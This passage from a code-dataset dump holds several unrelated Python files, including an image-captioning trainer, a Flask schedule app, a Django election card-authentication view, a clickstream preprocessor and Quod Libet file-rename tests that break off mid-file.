self.units))\n\nencoder = CNN_Encoder(embedding_dim)\ndecoder = RNN_Decoder(embedding_dim, units, vocab_size)\n\noptimizer = tf.train.AdamOptimizer()\n\n# We are masking the loss calculated for padding\ndef loss_function(real, pred):\n mask = 1 - np.equal(real, 0)\n loss_ = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=real, logits=pred) * mask\n return tf.reduce_mean(loss_)\n\n\n########################## training \n# adding this in a separate cell because if you run the training cell \n# many times, the loss_plot array will be reset\nloss_plot = []\nEPOCHS = 20\n\nfor epoch in range(EPOCHS):\n start = time.time()\n total_loss = 0\n\n for (batch, (img_tensor, target)) in enumerate(dataset):\n loss = 0\n\n # initializing the hidden state for each batch\n # because the captions are not related from image to image\n hidden = decoder.reset_state(batch_size=target.shape[0])\n\n dec_input = tf.expand_dims(\n [tokenizer.word_index['']] * BATCH_SIZE, 1)\n\n with tf.GradientTape() as tape:\n features = encoder(img_tensor)\n\n for i in range(1, target.shape[1]):\n # passing the features through the decoder\n predictions, hidden, _ = decoder(dec_input, features, hidden)\n\n loss += loss_function(target[:, i], predictions)\n\n # using teacher 
forcing\n dec_input = tf.expand_dims(target[:, i], 1)\n\n total_loss += (loss / int(target.shape[1]))\n\n variables = encoder.variables + decoder.variables\n\n gradients = tape.gradient(loss, variables)\n\n optimizer.apply_gradients(\n zip(gradients, variables), tf.train.get_or_create_global_step())\n\n if batch % 100 == 0:\n print('Epoch {} Batch {} Loss {:.4f}'.format(epoch + 1,\n batch,\n loss.numpy() / int(target.shape[1])))\n # storing the epoch end loss value to plot later\n loss_plot.append(total_loss / len(cap_vector))\n\n print('Epoch {} Loss {:.6f}'.format(epoch + 1,\n total_loss/len(cap_vector)))\n print('Time taken for 1 epoch {} sec\\n'.format(time.time() - start))\n\n\nplt.plot(loss_plot)\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.title('Loss Plot')\nplt.show()\n\n'''\n Evaluation part\n'''\n\ndef evaluate(image):\n attention_plot = np.zeros((max_length, attention_features_shape))\n\n hidden = decoder.reset_state(batch_size=1)\n\n temp_input = tf.expand_dims(load_image(image)[0], 0)\n img_tensor_val = image_features_extract_model(temp_input)\n img_tensor_val = tf.reshape(img_tensor_val, (img_tensor_val.shape[0], -1, img_tensor_val.shape[3]))\n\n features = encoder(img_tensor_val)\n\n dec_input = tf.expand_dims([tokenizer.word_index['']], 0)\n result = []\n\n for i in range(max_length):\n predictions, hidden, attention_weights = decoder(dec_input, features, hidden)\n\n attention_plot[i] = tf.reshape(attention_weights, (-1, )).numpy()\n\n predicted_id = tf.argmax(predictions[0]).numpy()\n result.append(tokenizer.index_word[predicted_id])\n\n if tokenizer.index_word[predicted_id] == '':\n return result, attention_plot\n\n dec_input = tf.expand_dims([predicted_id], 0)\n\n attention_plot = attention_plot[:len(result), :]\n return result, attention_plot\n\ndef plot_attention(image, result, attention_plot):\n temp_image = np.array(Image.open(image))\n\n fig = plt.figure(figsize=(10, 10))\n \n len_result = len(result)\n for l in range(len_result):\n temp_att = np.resize(attention_plot[l], (8, 8))\n ax = fig.add_subplot(len_result//2, len_result//2, l+1)\n ax.set_title(result[l])\n img = ax.imshow(temp_image)\n ax.imshow(temp_att, cmap='gray', alpha=0.6, extent=img.get_extent())\n\n plt.tight_layout()\n plt.show()\n\n\n# captions on the validation set\nrid = np.random.randint(0, len(img_name_val))\nimage = img_name_val[rid]\nreal_caption = ' '.join([tokenizer.index_word[i] for i in cap_val[rid] if i not in [0]])\nresult, attention_plot = evaluate(image)\n\nprint ('Real Caption:', real_caption)\nprint ('Prediction Caption:', ' '.join(result))\nplot_attention(image, result, attention_plot)\n# opening the image\nImage.open(img_name_val[rid])\n","repo_name":"PotatoThanh/Residual-Self-Attention-Net","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14712,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"30790044276","text":"from flask import Flask, request, render_template\nfrom utils import get_timestamps, get_classes_info\n\ndays = {\n\t'monday': 'Mon',\n\t'tuesday': 'Tue',\n\t'wednesday': 'Wed',\n\t'thursday': 'Thu',\n\t'friday': 'Fri',\n\t# 'saturday': 'Sat',\n\t# 'sunday': 'Sun'\n}\n\napp = Flask(__name__)\n\n\n@app.route('/golf')\ndef index():\n\tselected_day = request.args.get('selected_day') or 'monday'\n\n\ttimestamps = get_timestamps()\t\n\tclasses_info = get_classes_info(selected_day)\n\n\treturn render_template('index.html', days=days, selected_day=selected_day, timestamps=timestamps, classes_info=classes_info)\n\n\nif __name__ == '__main__':\n\tapp.run(debug=True, host='0.0.0.0', port=3000)\n","repo_name":"fast40/schedules","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"74379596851","text":"import tensorflow as tf\nimport cv2\nimport os\n\n# Categories = ['Aadhar','PAN']\nl = [x[1] for x in os.walk('../resources/')]\nl[2].sort()\nCategories = l[2]\nnumcat = len(Categories)\nthreshold = 1/numcat\n\nllll = [x[1] for x in os.walk('../model/')]\nlll = llll[0]\n# print(lll)\n\n\ndef prepare(filepath):\n IMG_SIZE = 224\n img_array = cv2.imread(filepath)\n new_array = cv2.resize(img_array,(IMG_SIZE,IMG_SIZE))\n return new_array.reshape(-1,IMG_SIZE,IMG_SIZE,3,1)\n\n\n# model = tf.keras.models.load_model('../model/model1')\n\n# # print(img2.shape)\n# prediction = model.predict([prepare('../../uploads/example.jpeg')])\n# print(prediction)\n# print(int(prediction[0][0]))\n# print( Categories[int(prediction[0][1])] )\n\n# st = pytesseract.image_to_string(img)\n# print(st)\n\n\ndef predict(filepath):\n img = cv2.imread(filepath)\n model_path =''\n \n if 'model2' in lll:\n model_path = '../model/model2'\n else:\n model_path = '../model/model1'\n\n\n #loading the trained model\n model = tf.keras.models.load_model(model_path) #make this dynamic later\n\n \n prediction = model.predict([prepare(filepath)])\n \n ll = list(prediction[0]) # converting numpy array to list \n pos = ll.index(max(ll))\n \n\n if(ll[pos]>threshold):\n f = open(\"../resources/classification_output/out.txt\", \"w\")\n f.write(Categories[pos])\n f.close()\n return ( Categories[pos] )\n \n else:\n return ('new')\n\n\n # return ( Categories[int(prediction[0][1])] )\n \n\n\n ","repo_name":"Aravind2503/Document-detection","sub_path":"python/src/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"7854066020","text":"import os\nimport numpy as np\nimport torch\nimport matplotlib.pyplot as plt\nimport torchvision\nimport cv2\nfrom torch.utils import data\n\nfrom dataset.blend_utils.faceBlending import Blender\nfrom dataset.aug_trans.aug_trans import Augmentator, data_transform\n\n\nclass BI_dataset_saved_aug(data.Dataset):\n \"\"\"读取和测试的 BI 数据集,标签写在 list.txt 里,采用 albumentations 做增强\n \n 读取参数:目录、具体路径与标签名(如果是1,应该有对应路径+_label.jpg的标签)\n root 目录下应该有 0.jpg 的全黑图片,对应标签为 0 的 xray\n 对于 test set,返回的 xray label 就是 cls_label\n \"\"\"\n\n def __init__(self, root, list_name, mode='train', Transform='simple'):\n super(BI_dataset_saved_aug, self).__init__()\n if mode not in ['train', 'valid', 'test'] or\\\n Transform not in ['simple', 'pixel']:\n raise NotImplementedError()\n\n self.mode = 'train'\n if mode == 'test':\n self.mode = 'test'\n \n self.root = root\n list_path = os.path.join(root, list_name)\n\n self._parse_data(list_path)\n\n \n if Transform == 'simple':\n self.pixel_aug = Augmentator('simple')\n self.spatial_aug = None\n elif Transform == 'pixel':\n self.pixel_aug = Augmentator('pixel_aug')\n self.spatial_aug = None\n else:\n raise NotImplementedError(Transform)\n\n # 只为用到 Blender.img_loader,为了保持与训练一致\n self.blender = Blender(\n ldmPath=None, dataPath=None,\n topk=100, selectNum=1, gaussianKernel=[31,63], gaussianSigma=[7, 15], loader='cv',\n pixel_aug=self.pixel_aug, spatial_aug=self.spatial_aug\n )\n\n self.trans_image = data_transform(normalize=True)\n self.trans_xray = data_transform(normalize=False)\n \n def _parse_data(self, list_path):\n\n labels, img_paths = [], []\n with open(list_path, 'r') as f:\n for line in f:\n label, img_path = line.strip().split()\n labels.append(int(label))\n img_paths.append(img_path)\n\n self.files = []\n cnts = [0, 0]\n\n for label, name in zip(labels, img_paths):\n img_file = os.path.join(self.root, name)\n if self.mode == 'test':\n label_file = None\n elif label == 0:\n label_file = os.path.join(self.root, \"0.jpg\")\n elif label == 1:\n nameRoot, ext = os.path.splitext(name)\n label_file = os.path.join(self.root, \"%s_label%s\" % (nameRoot, ext))\n else:\n raise NotImplementedError('label: %d' % label)\n cnts[label] += 1\n \n cls_label = label\n self.files.append({\n \"img\": img_file,\n \"label\": label_file,\n \"cls_label\": cls_label,\n \"name\": name\n })\n print('[DATA] label images for dataset %s: %d:%d' %(list_path, *cnts))\n\n def __len__(self):\n\n return len(self.files)\n\n def __getitem__(self, index):\n\n datafiles = self.files[index]\n\n name = datafiles[\"name\"]\n image = self.blender.img_loader(datafiles[\"img\"])\n cls_label = int(datafiles[\"cls_label\"])\n\n xray = None\n if self.mode != 'test':\n xray = self.blender.img_loader(datafiles[\"label\"], gray=True)\n # xray = np.expand_dims(xray, 0)\n else:\n xray = cls_label\n\n size_origin = image.size # W * H\n\n # 将opencv image转换为Tensor\n image = self.trans_image(image=image)['image']\n if self.mode != 'test': # 测试下没有 xray 的 label 标签\n xray = self.trans_xray(image=xray)['image']\n xray = xray.unsqueeze(0)\n\n return image, xray, cls_label, np.array(size_origin), name\n\n\n# 测试\nif __name__ == '__main__':\n\n ROOTPATH = '/nas/hjr/FF++c23/original'\n LISTNAME = 'selected10kTrain.txt'\n Batch_size = 4\n\n dataset = BI_dataset_saved_aug(root=ROOTPATH, list_name = LISTNAME, mode='train', Transform='simple')\n dataloader = torch.utils.data.DataLoader(dataset=dataset, batch_size=Batch_size, shuffle=True)\n\n plt.ion()\n\n for i, data in enumerate(dataloader):\n imgs, labels, 
cls_label, _, _ = data\n import pdb\n pdb.set_trace()\n\n # 减少第0个维度\n # imgs = imgs.squeeze(0)\n # labels = labels.squeeze(0)\n\n # 把所有图像拼在一起\n img = torchvision.utils.make_grid(imgs).numpy()\n labels = torchvision.utils.make_grid(labels).numpy()\n\n imgs = np.transpose(img, (1, 2, 0))\n labels = np.transpose(labels, (1, 2, 0))\n\n plt.imshow(imgs)\n plt.show()\n plt.pause(0.5)\n\n","repo_name":"jerry4h/Face_Xray","sub_path":"Net_gpuVer5.0/dataset/BI_dataset_saved_aug.py","file_name":"BI_dataset_saved_aug.py","file_ext":"py","file_size_in_byte":4856,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"}
+{"seq_id":"18428294710","text":"import logging\nfrom .generics import BaseElectionView\nfrom core.exceptions import AlreadyVoted, CardInvalid, ElectorBanned, ElectorSuspicious, NotQualified\nfrom core.serializers import AuthenticateSerializer\nfrom core.services import aca, AuthenticationError\nfrom core.models import Ballot, Elector, Session\nfrom django.conf import settings\nfrom rest_framework.response import Response\n\nlogger = logging.getLogger('vote')\n\nclass AuthenticateView(BaseElectionView):\n \"\"\"\n Authenticates card information against ACA API and returns available ballots.\n \"\"\"\n serializer_class = AuthenticateSerializer\n\n def post(self, request, *args, **kwargs):\n # Sanitize input\n election = self.get_object()\n station = request.user.station\n validated_data = self.get_validated_data(request)\n\n # Read validated data and authenticate against ACA\n internal_id = validated_data['internal_id']\n student_id = validated_data['student_id']\n revision = validated_data['revision']\n\n # Prepare the session\n session = Session.objects.create(election=election, station=station, student_id=student_id, revision=revision)\n\n # Authentication methods:\n # 1) internal + student ID [\"strict\" mode]\n # 2) internal ID only [\"quirk\" mode] (for less capable NFC clients)\n # 3) student ID only (rely on client side validation)\n\n # Log the request first\n if settings.CARD_VALIDATION_QUIRK:\n logger.info('Station %s requests card (%s****)', station.id, internal_id[:4])\n else:\n logger.info('Station %s requests card %s[%s]', student_id, revision)\n\n # Call corresponding ACA API\n try:\n if not settings.CARD_VALIDATION_OFF:\n info = aca.to_student_id(internal_id) # Use internal ID to authenicate\n\n # Double check if student ID matches in strict mode\n if settings.CARD_VALIDATION_STRICT and info.id != student_id:\n logger.warning('ID %s returned instead', info.id)\n session.save_state(Session.NOT_AUTHENTICATED)\n raise ElectorSuspicious\n\n else:\n student_id_with_rev = student_id + str(revision)\n info = aca.query_student(student_id_with_rev) # Query student ID instead\n\n # Error handling\n # We don't catch ExternalError as we can do nothing about it.\n except AuthenticationError as e:\n session.save_state(Session.NOT_AUTHENTICATED)\n code = e.get_codes()\n if code == 'card_invalid':\n raise CardInvalid\n else: # Let ACA error codes pass through\n raise ElectorSuspicious(code=code)\n\n # Now that ACA has verified the elector,\n # we'll check against our record if there were any previous voting sessions.\n sessions = Session.objects.filter(student_id=student_id)\n\n # 1) Check if the elector has voted or not\n if sessions.filter(state__in=(Session.VOTING, Session.VOTED, Session.REMOTE_VOTED)).exists():\n session.save_state(Session.NOT_AUTHENTICATED)\n raise AlreadyVoted\n # 2) Check if the elector was banned (either by registering remote voting\n # or earlier unlawful attempts.)\n elif sessions.filter(state__in=(Session.ABORTED, Session.BANNED)).exists():\n session.save_state(Session.NOT_AUTHENTICATED)\n raise ElectorBanned\n\n # 3) Iterate through previous records, cancel out incomplete sessions;\n # double-check on previous information if available.\n for old_session in sessions.order_by('created'):\n # Check on previous revision record; reject if using an older one.\n if old_session.revision > revision:\n session.save_state(Session.NOT_AUTHENTICATED)\n raise ElectorSuspicious\n\n # Cancel out older sessions\n if old_session.state in (Session.AUTHORIZED, Session.CANCELED):\n 
# Session terminated before booth allocation.\n if old_session.state == Session.AUTHORIZED:\n logger.info('Expiring session #%s [S%s] (2 → Z)', old_session.id, old_session.station.id)\n old_session.save_state(Session.CANCELED)\n else:\n logger.info('Found old canceled session #%s [S%s]', old_session.id, old_session.station.id)\n\n # Since the elector has confirmed their identity and we've already\n # requested an auth code based on that, no re-evaluation would be done.\n # We'll just return cached identities instead.\n ballots = old_session.ballots.all()\n session.auth_code = old_session.auth_code\n session.save_state(Session.AUTHENTICATED)\n session.ballots.add(*ballots)\n\n return Response({\n 'status': 'success', 'session_key': session.key, 'cached': True,\n 'college': info.college, 'department': info.department,\n 'ballots': [ballot.name for ballot in ballots],\n })\n\n elif old_session.state == Session.AUTHENTICATED:\n # Session terminated before confirming identity.\n # No big deal. We'll just invalidate this session.\n logger.info('Expiring session #%s [S%s] (1 → Y)', old_session.id, old_session.station.id)\n old_session.save_state(Session.NOT_VERIFIED)\n\n elif old_session.state != Session.NOT_AUTHENTICATED:\n # Either we've bumped into CREATED or some unknown state.\n # Shouldn't occur but we'll cancel it out anyway.\n logger.warning('Expiring session #%s [S%s] (%s → X)', old_session.id, old_session.station.id, old_session.state)\n old_session.save_state(Session.NOT_AUTHENTICATED)\n\n #\n # ...Authentication succeeded.\n\n # Build up elector information for condition matching\n student_type = info.id[0]\n elector_data = {\n # Known information\n 'type': student_type, 'college': info.college_id, 'department': info.department,\n # Normalized information\n 'standing': ('R' if student_type in settings.GRADUATE_CODE else\n ('B' if student_type in settings.UNDERGRADUATE_CODE else '')),\n }\n\n # Filter out ineligible identities as regulated in Election & Recall Act §13(2).\n if student_type not in settings.GENERAL_CODE:\n logger.warning('Student %s does not qualify as elector', student_id)\n session.save_state(Session.NOT_AUTHENTICATED)\n raise NotQualified\n\n # Iterate through ballots and check eligibility\n ballots = []\n for ballot in Ballot.objects.all_ballots(election=election):\n # 1) Check if the elector is explicitly specified in list.\n # Takes presedence over all ballot conditions.\n try:\n elector = ballot.electors.get(student_id=student_id)\n if elector.is_allowed:\n ballots.append(ballot)\n continue\n except Elector.DoesNotExist:\n pass # This elector isn't explicitly black/whitelisted. 
Good.\n\n # 2) Matches the elector data against ballot conditions.\n # We've done the logic on models, so just call the method.\n if ballot.match(fields=elector_data):\n ballots.append(ballot)\n\n # 3) Checks if there is at least one ballot to vote.\n if not ballots:\n logger.warning('Student %s does not qualify any ballot', student_id)\n session.save_state(Session.NOT_AUTHENTICATED)\n raise NotQualified # Fail if there aren't any\n\n # Saves the session and intermediate information\n session.ballots.add(*ballots)\n session.save_state(Session.AUTHENTICATED)\n\n # Returns the ballot information and the session key for further operation\n return Response({\n 'status': 'success', 'session_key': session.key,\n 'college': info.college, 'department': info.department,\n 'ballots': [ballot.name for ballot in ballots],\n })\n","repo_name":"rschiang/ntu-vote-auth-server","sub_path":"core/views/authenticate.py","file_name":"authenticate.py","file_ext":"py","file_size_in_byte":8353,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"}
+{"seq_id":"16562884452","text":"from sly import Lexer\n\nclass SLexer(Lexer) :\n tokens = {\n LETTERS,\n SPECS,\n NUMS,\n OP,\n OPEN,\n CLOSE,\n SPACE,\n }\n\n LETTERS = r'[a-zA-Z]+'\n SPECS = r'[\\'|\\\"]+'\n NUMS = r'[0-9]+'\n OP = r'[+|-|*|/|%|=]'\n \n OPEN = r'[(]'\n CLOSE = r'[)]'\n\n ignore = ' \\t'\n\nif __name__ == '__main__':\n lexer = SLexer()\n while True :\n x = input()\n for tok in lexer.tokenize(x) :\n if x == 'exit' :\n exit()\n print('type=%r, value=%r' % (tok.type, tok.value))","repo_name":"CodeWizrd001/CompilerLab","sub_path":"Trials/Python/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"70686837493","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport pandas as pd\nimport re\n\nfile = 'clickstream-enwiki-2020-01.tsv'\nfolder = '../Datasets/'\npath = folder+file\n\ndf = pd.read_csv(path, delimiter='\\t', \n encoding='utf-8', names=['referer', 'resource', 'path', 'count'])\n\n# get all external link click count for resource\ndf_external_count = df.groupby(['resource', 'path'])['count'].sum()\ndf_external_count = df_external_count.reset_index()\ndf_external_count = df_external_count.loc[df_external_count['path'] == 'external']\ndf_external_count['referer'] = 'other-external'\n\n# get all internal link click count for resource\ndf_internal = df.loc[df['path'] == 'link']\ndf_internal = df_internal.dropna()\n\n# combine them together\ndf_combined = pd.concat([df_internal, df_external_count], axis=0)\ndf_combined = df_combined.sort_values(by=['resource', 'path', 'count']).reset_index(drop=True)\n\nreg = re.compile(r'[^a-zA-Z0-9\\-\\_.]')\n\ndef preprocess(doc):\n rs = ''\n if(reg.search(doc) == None): \n rs = doc\n return rs\n\n# get english alphabets, numbers, -, and _ only\ndf_combined['resource'] = df_combined['resource'].apply(preprocess)\ndf_result = df_combined[df_combined['resource'].map(len) > 0]\n\n# get date from file name\ndate = file[-11:-4].replace('-', '')\ndf_result['date'] = date\n\n# reorder and rename the columns\ndf_result = df_result[['date', 'resource', 'referer', 'count']].rename(\n columns={'resource': 'title', 'referer': 'from'})\ndf_result = df_result.reset_index(drop=True)\n\n# Writing to CSV\ndf_result.to_csv('Results/clickstream-'+date+'.csv')\n\n# Saving to MySQL Format\n\n# from pandas.io import sql\n# import MySQLdb\n\n# con = MySQLdb.connect()\n# df_result.to_sql(con=con, name='clickstream-'+date, if_exists='replace', flavor='mysql')","repo_name":"atwong88/WikiPlugin","sub_path":"jenkins/jenkins-master/scripts/clickstream_to_sql.py","file_name":"clickstream_to_sql.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"42176443055","text":"import json\nimport logging\n\nimport requests\n\nfrom config import settings\nfrom serializers.film import film_serializer\n\n\nasync def retrieve_films(message):\n r = requests.get(url=f\"{settings.films_url}{message.from_user.id}\")\n films = r.text\n await film_serializer(films=json.loads(films), message=message)\n\n\nasync def retrieve_reviewed_films(message):\n url = settings.films_url\n user_id = message.from_user.id\n r = requests.get(url=f\"{url}{user_id}?parameter=viewed&query=True\")\n films = r.text\n await film_serializer(films=json.loads(films), message=message)\n\n\nasync def retrieve_unreviewed_films(message):\n url = settings.films_url\n user_id = message.from_user.id\n r = requests.get(url=f\"{url}{user_id}?parameter=viewed&query=False\")\n films = r.text\n await film_serializer(films=json.loads(films), message=message)\n\n\nasync def add_film(message, data):\n url = settings.films_url\n user_id = message.from_user.id\n data[\"user_id\"] = user_id\n r = requests.post(url=url, headers=settings.headers, data=json.dumps(data))\n logging.info(f\"{r.status_code}|{r.text}\")\n\n\nasync def delete(callback):\n user_id = callback.from_user.id\n name = callback.message.text.split(\":\")[1].split(\"\\n\")[0].lstrip()\n url = f\"{settings.films_url}{user_id}/{name}\"\n r = requests.delete(url=url, headers=settings.headers)\n return r.status_code\n\n\nasync def review(data, mark):\n user_id = data[0]\n mark = int(abs(mark))\n if mark > 10:\n mark = 10\n name = data[1].split(\":\")[1].split(\"\\n\")[0].lstrip()\n url = f\"{settings.films_url}{user_id}/{name}/{mark}\"\n r = requests.patch(url=url, headers=settings.headers)\n return r.status_code\n","repo_name":"berendovychRB/Bolvanka_telegram_bot","sub_path":"src/services/film.py","file_name":"film.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"74991442291","text":"# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n\nimport os\nimport glob\nfrom typing import Text\n\nfrom gi.repository import Gtk, GObject\n\nfrom tests import TestCase, mkdtemp\n\nfrom senf import fsnative\n\nfrom quodlibet import config\nfrom quodlibet.formats import AudioFile\nfrom quodlibet.qltk.renamefiles import (StripDiacriticals, StripNonASCII,\n Lowercase, SpacesToUnderscores,\n StripWindowsIncompat, RenameFiles,\n ReplaceColons)\n\n\nclass TFilter(TestCase):\n def setUp(self):\n self.c = self.Kind()\n\n def tearDown(self):\n self.c.destroy()\n\n\nclass TFilterMixin:\n\n def test_mix_empty(self):\n empty = fsnative(u\"\")\n v = self.c.filter(empty, u\"\")\n self.failUnlessEqual(v, u\"\")\n self.failUnless(isinstance(v, str))\n\n def test_mix_safe(self):\n empty = fsnative(u\"\")\n safe = u\"safe\"\n self.failUnlessEqual(self.c.filter(empty, safe), safe)\n\n\nclass TSpacesToUnderscores(TFilter, TFilterMixin):\n Kind = SpacesToUnderscores\n\n def test_conv(self):\n self.failUnlessEqual(self.c.filter(\"\", \"foo bar \"), \"foo_bar_\")\n\n\nclass TStripWindowsIncompat(TFilter, TFilterMixin):\n Kind = StripWindowsIncompat\n\n def test_conv(self):\n if os.name == \"nt\":\n self.failUnlessEqual(\n self.c.filter(u\"\", u'foo\\\\:*?;\"<>|/'), u\"foo\\\\_________\")\n else:\n self.failUnlessEqual(\n self.c.filter(\"\", 'foo\\\\:*?;\"<>|/'), \"foo_________/\")\n\n def test_type(self):\n empty = fsnative(u\"\")\n self.assertTrue(isinstance(self.c.filter(empty, empty), fsnative))\n\n def test_ends_with_dots_or_spaces(self):\n empty = fsnative(u\"\")\n v = self.c.filter(empty, fsnative(u\"foo. . \"))\n self.failUnlessEqual(v, fsnative(u\"foo. ._\"))\n self.assertTrue(isinstance(v, fsnative))\n\n if os.name == \"nt\":\n self.failUnlessEqual(\n self.c.filter(empty, u\"foo. \\\\bar .\"), u\"foo._\\\\bar _\")\n else:\n self.failUnlessEqual(\n self.c.filter(empty, u\"foo. /bar .\"), \"foo._/bar _\")\n\n\nclass TReplaceColons(TFilter, TFilterMixin):\n Kind = ReplaceColons\n\n def test_leaves_colons_without_space(self):\n assert self.unaffected(\"Nu:Tone & others - mix.flac\")\n assert self.unaffected(\"Elastica - 2:1.mp3\")\n\n def test_replaces_colons_as_delimiters(self):\n assert self.conv(\"ii: allegro\") == \"ii - allegro\"\n\n def test_replaces_semicolons_as_delimiters(self):\n assert (self.conv(\"Mozart; Requiem in D minor\")\n == \"Mozart - Requiem in D minor\")\n\n def test_replaces_colons_with_lots_of_spaces(self):\n assert (self.conv(\"Cello Suite No 1 : Prelude\")\n == self.conv(\"Cello Suite No 1 - Prelude\"))\n\n def test_replaces_colons_with_non_word(self):\n assert (self.conv('No. 1 \"Minute\": Molto vivace')\n == self.conv('No. 
1 \"Minute\" - Molto vivace'))\n\n def test_type(self):\n empty = fsnative(u\"\")\n self.assertTrue(isinstance(self.c.filter(empty, empty), fsnative))\n\n def conv(self, s: Text):\n return self.c.filter(fsnative(\"\"), s)\n\n def unaffected(self, s: Text) -> bool:\n return self.conv(s) == s\n\n\nclass TStripDiacriticals(TFilter, TFilterMixin):\n Kind = StripDiacriticals\n\n def test_conv(self):\n empty = fsnative(u\"\")\n test = u\"\\u00c1 test\"\n out = u\"A test\"\n v = self.c.filter(empty, test)\n self.failUnlessEqual(v, out)\n self.failUnless(isinstance(v, str))\n\n\nclass TStripNonASCII(TFilter, TFilterMixin):\n Kind = StripNonASCII\n\n def test_conv(self):\n empty = fsnative(u\"\")\n in_ = u\"foo \\u00c1 \\u1234\"\n out = u\"foo _ _\"\n v = self.c.filter(empty, in_)\n self.failUnlessEqual(v, out)\n self.failUnless(isinstance(v, str))\n\n\nclass TLowercase(TFilter, TFilterMixin):\n Kind = Lowercase\n\n def test_conv(self):\n empty = fsnative(u\"\")\n\n v = self.c.filter(empty, fsnative(u\"foobar baz\"))\n self.failUnlessEqual(v, fsnative(u\"foobar baz\"))\n self.failUnless(isinstance(v, fsnative))\n\n v = self.c.filter(empty, fsnative(u\"Foobar.BAZ\"))\n self.failUnlessEqual(v, fsnative(u\"foobar.baz\"))\n self.failUnless(isinstance(v, fsnative))\n\n\nclass Renamer(Gtk.EventBox):\n __gsignals__ = {\n \"changed\": (GObject.SignalFlags.RUN_LAST, None, (object,)),\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__()\n\n from quodlibet.library import SongLibrary\n\n self.library = SongLibrary()\n box = Gtk.EventBox()\n self.renamer = RenameFiles(self.library, box)\n box.add(self.renamer)\n\n self.renamer.test_mode = True\n\n def add_songs(self, songs):\n self.library.add(songs)\n\n def rename(self, pattern, songs):\n self.renamer.combo.get_child().set_text(pattern)\n self.renamer._preview(songs)\n self.renamer._rename(self.library)\n\n\nclass Song(AudioFile):\n \"\"\"A mock AudioFile belong to one of three albums,\n based on a single number\"\"\"\n\n def __init__(self, target, num):\n super().__init__()\n\n self[\"title\"] = \"title_%d\" % (num + 1)\n self[\"artist\"] = \"artist\"\n self[\"album\"] = \"album\"\n self[\"labelid\"] = self[\"album\"]\n self[\"~filename\"] = \\\n fsnative(os.path.join(target, self[\"title\"] + \".mp3\"))\n\n\nclass TMoveArt(TestCase):\n Kind = Renamer\n\n def setUp(self):\n self.renamer = self.Kind()\n\n def tearDown(self):\n self.renamer.destroy()\n\n def reset_environment(self):\n config.init()\n self.root_path = mkdtemp()\n self.filenames = \\\n [\"cover.jpg\", \"info.jpg\", \"title.jpg\", \"title2.jpg\"]\n\n def generate_songs(self, path, quantity):\n return [Song(path, num) for num in range(quantity)]\n\n def generate_files(self, path, filenames):\n pathfiles = []\n for f in filenames:\n pathfile = os.path.join(path, f)\n if not os.path.isdir(os.path.dirname(pathfile)):\n os.makedirs(os.path.dirname(pathfile))\n with open(pathfile, \"w\") as fh:\n fh.write(f)\n pathfiles.append(pathfile)\n\n return pathfiles\n\n def art_set(self, path):\n return self.generate_files(path, self.filenames)\n\n def song_set(self, path):\n songs = self.generate_songs(path, 1)\n files = self.generate_files(path, [os.path.basename(song[\"~filename\"])\n for song in songs])\n return files, songs\n\n def source_target(self, root_path, album, artist):\n return (os.path.join(root_path, album, artist),\n os.path.join(root_path + \"_2\", album, artist))\n\n def moveart_set(self, artist=\"artist\", album=\"album\",\n source=None, target=None, file_pattern=\"\"):\n 
source2, target2 = \\\n self.source_target(self.root_path, artist, album)\n if not source:\n source = source2\n if not target:\n target = target2\n self.art_set(source)\n song_files, songs = self.song_set(source)\n self.renamer.add_songs(songs)\n pattern = os.path.join(target, file_pattern)\n self.renamer.rename(pattern, songs)\n return (source, target)\n\n def test_no_move(self):\n self.reset_environment()\n\n # move art not set, no art files should move\n count_expected = 0\n source, target = self.moveart_set()\n target_files = glob.glob(os.path.join(target, \"*.jpg\"))\n count_target = len(target_files)\n self.failUnlessEqual(count_target, count_expected)\n\n def test_move_defaults(self):\n self.reset_environment()\n config.set(\"rename\", \"move_art\", True)\n\n # single match for default search_filenames\n # \"cover.jpg,folder.jpg,.folder.jpg\"\n count_expected = 1\n source, target = self.moveart_set()\n target_files = glob.glob(os.path.join(target, \"*.jpg\"))\n count_target = len(target_files)\n self.failUnlessEqual(count_target, count_expected)\n\n def test_move_all_wildcard(self):\n self.reset_environment()\n config.set(\"rename\", \"move_art\", True)\n config.set(\"albumart\", \"search_filenames\", \"*.jpg\")\n\n # wildcard added to search_filenames for catchall\"\n count_expected = 4\n source, target = self.moveart_set()\n target_files = glob.glob(os.path.join(target, \"*.jpg\"))\n count_target = len(target_files)\n self.failUnlessEqual(count_target, count_expected)\n\n def test_move_escape_glob_characters(self):\n self.reset_environment()\n config.set(\"rename\", \"move_art\", True)\n config.set(\"albumart\", \"search_filenames\", \"*.jpg\")\n self.filenames = [\"artist_[x].jpg\"]\n\n # test whether we cope with non-escaped special glob characters\"\n count_expected = 1\n source, target = self.moveart_set()\n target_files = glob.glob(os.path.join(target, \"*.jpg\"))\n count_target = len(target_files)\n self.failUnlessEqual(count_target, count_expected)\n\n def test_relative_pattern(self):\n self.reset_environment()\n config.set(\"rename\", \"move_art\", True)\n config.set(\"albumart\", \"search_filenames\", \"*.jpg\")\n\n # should be a no-op\"\n count_expected = 4\n source, target = 